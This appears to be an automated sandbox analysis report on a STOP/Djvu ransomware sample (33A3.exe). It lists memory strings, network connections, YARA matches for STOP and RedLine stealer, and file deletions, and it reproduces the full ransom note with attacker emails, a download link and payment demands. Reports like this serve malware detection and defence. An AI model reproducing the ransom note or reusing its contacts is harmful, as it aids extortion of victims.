Source: explorer.exe, 00000002.00000000.2049221866.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2049221866.0000000009B0B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3004817424.00000000083C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3009500853.00000000083C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.3263362552.00000000083C3000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3013299726.00000000083C6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3014031027.00000000083C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000002.00000000.2049221866.00000000099C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000002.00000000.2048376120.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2048773161.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2048794646.0000000008890000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://schemas.micro
Source: 33A3.exe, 00000010.00000003.2557600248.0000000003420000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.amazon.com/
Source: explorer.exe, 00000002.00000000.2051763871.000000000C8E8000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: 33A3.exe, 00000010.00000003.2558316744.0000000003420000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.google.com/
Source: 33A3.exe, 00000010.00000003.2558504781.0000000003420000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.live.com/
Source: 33A3.exe, 00000010.00000003.2558685731.0000000003420000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.nytimes.com/
Source: 33A3.exe, 0000001A.00000002.2629001294.0000000000400000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://www.openssl.org/support/faq.html
Source: 33A3.exe, 00000010.00000003.2558807456.0000000003420000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.reddit.com/
Source: 33A3.exe, 00000010.00000003.2558921582.0000000003420000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.twitter.com/
Source: 33A3.exe, 00000010.00000003.2559017569.0000000003420000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.wikipedia.com/
Source: 33A3.exe, 00000010.00000003.2559114058.0000000003420000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.youtube.com/
Source: explorer.exe, 00000002.00000000.2051021521.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000002.00000000.2047730753.00000000076F8000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://android.notify.windows.com/iOS
Source: 33A3.exe, 00000009.00000002.2422986001.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 0000000E.00000002.2443241260.0000000000650000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 00000010.00000002.3253450343.0000000000748000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000002.2629615392.000000000061A000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000003.2627682915.0000000000619000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000003.2628287801.000000000061A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/
Source: 33A3.exe, 00000009.00000002.2422986001.00000000008C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/6
Source: 33A3.exe, 00000017.00000002.2543892568.000000000074A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/gK
Source: 33A3.exe, 33A3.exe, 0000000E.00000002.2443241260.00000000005C0000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 0000000E.00000002.2442763090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 0000000E.00000002.2443241260.0000000000618000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 0000000E.00000002.2443241260.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 0000000F.00000002.2446025490.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 00000010.00000002.3250613248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 00000010.00000002.3253450343.0000000000708000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 00000016.00000002.2530314082.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 00000017.00000002.2543892568.000000000074A000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 00000017.00000002.2543892568.0000000000708000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 00000017.00000002.2541887297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 00000019.00000002.2617025690.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000002.2629001294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000002.2629615392.000000000061A000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000003.2627682915.0000000000619000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000002.2629448496.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000003.2628287801.000000000061A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.json
Source: 33A3.exe, 00000017.00000002.2543892568.0000000000708000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.json5
Source: 33A3.exe, 00000017.00000002.2543892568.0000000000708000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.json7
Source: 33A3.exe, 00000010.00000002.3253450343.0000000000748000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.jsonM
Source: 33A3.exe, 00000017.00000002.2543892568.0000000000708000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.jsonW
Source: 33A3.exe, 0000001A.00000002.2629448496.00000000005C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.jsonat
Source: 33A3.exe, 00000017.00000002.2543892568.0000000000708000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.jsondll
Source: 33A3.exe, 0000001A.00000002.2629448496.00000000005C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.jsondll7
Source: 33A3.exe, 0000001A.00000002.2629448496.00000000005C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.jsoniu
Source: 33A3.exe, 0000001A.00000002.2629448496.00000000005C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.jsoni~
Source: 33A3.exe, 0000001A.00000002.2629448496.00000000005C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.jsonn~
Source: 33A3.exe, 00000010.00000002.3253450343.0000000000708000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.jsonq
Source: 33A3.exe, 0000001A.00000002.2629448496.00000000005C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.jsons
Source: 33A3.exe, 00000010.00000002.3253450343.0000000000748000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/q
Source: 33A3.exe, 0000001A.00000002.2629615392.000000000061A000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000003.2627682915.0000000000619000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 0000001A.00000003.2628287801.000000000061A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/s
Source: 33A3.exe, 00000017.00000002.2543892568.000000000074A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/sK
Source: explorer.exe, 00000002.00000000.2049221866.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3009500853.00000000085A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3014031027.00000000085A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.3263362552.00000000085A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3004817424.00000000085A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3016685180.00000000085A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3013299726.00000000085A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3007904273.00000000085A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 0000001E.00000003.3009500853.00000000085A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3014031027.00000000085A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.3263362552.00000000085A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3004817424.00000000085A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3016685180.00000000085A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3013299726.00000000085A5000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3007904273.00000000085A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/)
Source: explorer.exe, 0000001E.00000003.3013299726.00000000085E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 0000001E.00000003.3004817424.0000000008423000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3014031027.0000000008423000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3009500853.0000000008423000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3013299726.0000000008423000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.3263362552.0000000008423000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000002.00000000.2047025434.00000000035FA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://arc.msn.coml
Source: explorer.exe, 0000001E.00000003.3029743671.0000000004F9A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: explorer.exe, 00000002.00000000.2049221866.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000002.00000000.2049221866.0000000009BA7000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://outlook.com
Source: explorer.exe, 0000001E.00000003.3016685180.0000000008636000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3009500853.0000000008636000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3004817424.0000000008636000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3014031027.0000000008636000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3013299726.0000000008636000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000003.3007904273.0000000008636000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.comQkL
Source: explorer.exe, 00000002.00000000.2051021521.000000000C460000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://powerpoint.office.comcember
Source: 33A3.exe, 00000010.00000002.3253450343.00000000007B2000.00000004.00000020.00020000.00000000.sdmp, 33A3.exe, 00000010.00000002.3253450343.0000000000790000.00000004.00000020.00020000.00000000.sdmp, _readme.txt0.16.dr, _readme.txt.16.dr String found in binary or memory: https://wetransfer.com/downloads/33b490a613f49fa190924f199d2c079e20240512191214/caaf73
Source: explorer.exe, 00000002.00000000.2049221866.00000000099C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://wns.windows.com/)s
Source: explorer.exe, 00000002.00000000.2049221866.00000000099C0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://word.office.comon
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50438
Source: unknown Network traffic detected: HTTP traffic on port 50470 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50441 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50442 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50461
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50441
Source: unknown Network traffic detected: HTTP traffic on port 50461 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50474
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50451
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50454
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50431
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50442
Source: unknown Network traffic detected: HTTP traffic on port 50454 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50470
Source: unknown Network traffic detected: HTTP traffic on port 50431 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50451 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50474 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50438 -> 443
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50431 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50438 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50441 version: TLS 1.2
Source: unknown HTTPS traffic detected: 103.174.152.66:443 -> 192.168.2.5:50442 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50451 version: TLS 1.2
Source: unknown HTTPS traffic detected: 192.185.16.114:443 -> 192.168.2.5:50454 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:50461 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.196.109.209:443 -> 192.168.2.5:50470 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.5:50474 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match File source: 00000004.00000002.2342373288.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2342416415.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2068350928.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.3280589230.000000000CAC1000.00000020.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2068279346.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\Temp\33A3.exe Code function: 9_2_004822E0 CreateDCA,CreateCompatibleDC,GetDeviceCaps,GetDeviceCaps,GetDeviceCaps,CreateCompatibleBitmap,SelectObject,GetObjectA,BitBlt,GetBitmapBits,SelectObject,DeleteObject,DeleteDC,DeleteDC,DeleteDC, 9_2_004822E0

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\AppData\Local\VirtualStore\_readme.txt Dropped file: ATTENTION!Don't worry, you can return all your files!All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.The only method of recovering files is to purchase decrypt tool and unique key for you.This software will decrypt all your encrypted files.What guarantees you have?You can send one of your encrypted file from your PC and we decrypt it for free.But we can decrypt only 1 file for free. File must not contain valuable information.Do not ask assistants from youtube and recovery data sites for help in recovering your data.They can use your free decryption quota and scam you.Our contact is emails in this text document only.You can get and look video overview decrypt tool:https://wetransfer.com/downloads/33b490a613f49fa190924f199d2c079e20240512191214/caaf73Price of private key and decrypt software is $999.Discount 50% available if you contact us first 72 hours, that's price for you is $499.Please note that you'll never restore your data without payment.Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.To get this software you need write on our e-mail:support@freshingmail.topReserve e-mail address to contact us:datarestorehelpyou@airmail.ccYour personal ID:0871PsawqS8Dvoqx3bvfv1GNOXwQLrS9NhK8A5BueudpVlCvCw
Source: Yara match File source: Process Memory Space: 33A3.exe PID: 2104, type: MEMORYSTR
Source: Yara match File source: 9.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.33A3.exe.4a415a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.33A3.exe.4a415a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.33A3.exe.4a015a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.33A3.exe.4a015a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.33A3.exe.4a015a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.33A3.exe.49e15a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 26.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.33A3.exe.4a015a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.33A3.exe.4a315a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.33A3.exe.4a315a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 25.2.33A3.exe.49e15a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000010.00000002.3250613248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.2629001294.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2446025490.0000000004A30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2396691282.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2442763090.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2422576325.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.2530314082.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2617025690.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2433122057.0000000004A40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.2541887297.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 33A3.exe PID: 4400, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 33A3.exe PID: 3556, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 33A3.exe PID: 3780, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 33A3.exe PID: 5964, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 33A3.exe PID: 5328, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 33A3.exe PID: 2104, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 33A3.exe PID: 2284, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 33A3.exe PID: 5560, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 33A3.exe PID: 5680, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 33A3.exe PID: 4276, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe File moved: C:\Users\user\Desktop\NVWZAPQSQL\TQDFJHPUIU.png
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe File moved: C:\Users\user\Desktop\EEGWXUHVUG\EEGWXUHVUG.docx
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe File deleted: C:\Users\user\Desktop\EEGWXUHVUG\EEGWXUHVUG.docx
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe File moved: C:\Users\user\Desktop\GRXZDKKVDB.png
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe File deleted: C:\Users\user\Desktop\GRXZDKKVDB.png
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe File dropped: C:\Users\user\AppData\Local\VirtualStore\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/33b490a613f49fa190924f199d2c079e20240512191214/caaf73price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address
Source: C:\Users\user\AppData\Local\914917ab-8c1c-4917-bfda-a5e2f0055a1d\33A3.exe File dropped: C:\Users\user\_readme.txt -> decrypt tool and unique key for you.this software will decrypt all your encrypted files.what guarantees you have?you can send one of your encrypted file from your pc and we decrypt it for free.but we can decrypt only 1 file for free. file must not contain valuable information.do not ask assistants from youtube and recovery data sites for help in recovering your data.they can use your free decryption quota and scam you.our contact is emails in this text document only.you can get and look video overview decrypt tool:https://wetransfer.com/downloads/33b490a613f49fa190924f199d2c079e20240512191214/caaf73price of private key and decrypt software is $999.discount 50% available if you contact us first 72 hours, that's price for you is $499.please note that you'll never restore your data without payment.check your e-mail "spam" or "junk" folder if you don't get answer more than 6 hours.to get this software you need write on our e-mail:support@freshingmail.topreserve e-mail address

System Summary

Source: 9.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 13.2.33A3.exe.4a415a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 13.2.33A3.exe.4a415a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 26.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 26.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 13.2.33A3.exe.4a415a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.2.33A3.exe.4a015a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 13.2.33A3.exe.4a415a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.2.33A3.exe.4a015a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 22.2.33A3.exe.4a015a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 22.2.33A3.exe.4a015a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 8.2.33A3.exe.4a015a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 8.2.33A3.exe.4a015a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 25.2.33A3.exe.49e15a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 25.2.33A3.exe.49e15a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 14.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 14.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 26.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 26.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 22.2.33A3.exe.4a015a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 22.2.33A3.exe.4a015a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 16.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 16.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 15.2.33A3.exe.4a315a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 15.2.33A3.exe.4a315a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 23.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 23.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 15.2.33A3.exe.4a315a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 15.2.33A3.exe.4a315a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 23.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 23.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 16.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 16.2.33A3.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 25.2.33A3.exe.49e15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 25.2.33A3.exe.49e15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 14.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 14.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.2.33A3.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000004.00000002.2342522385.0000000002E8B000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000010.00000002.3250613248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000010.00000002.3250613248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0000000D.00000002.2432836380.0000000002EB7000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000016.00000002.2529798141.0000000002EAE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
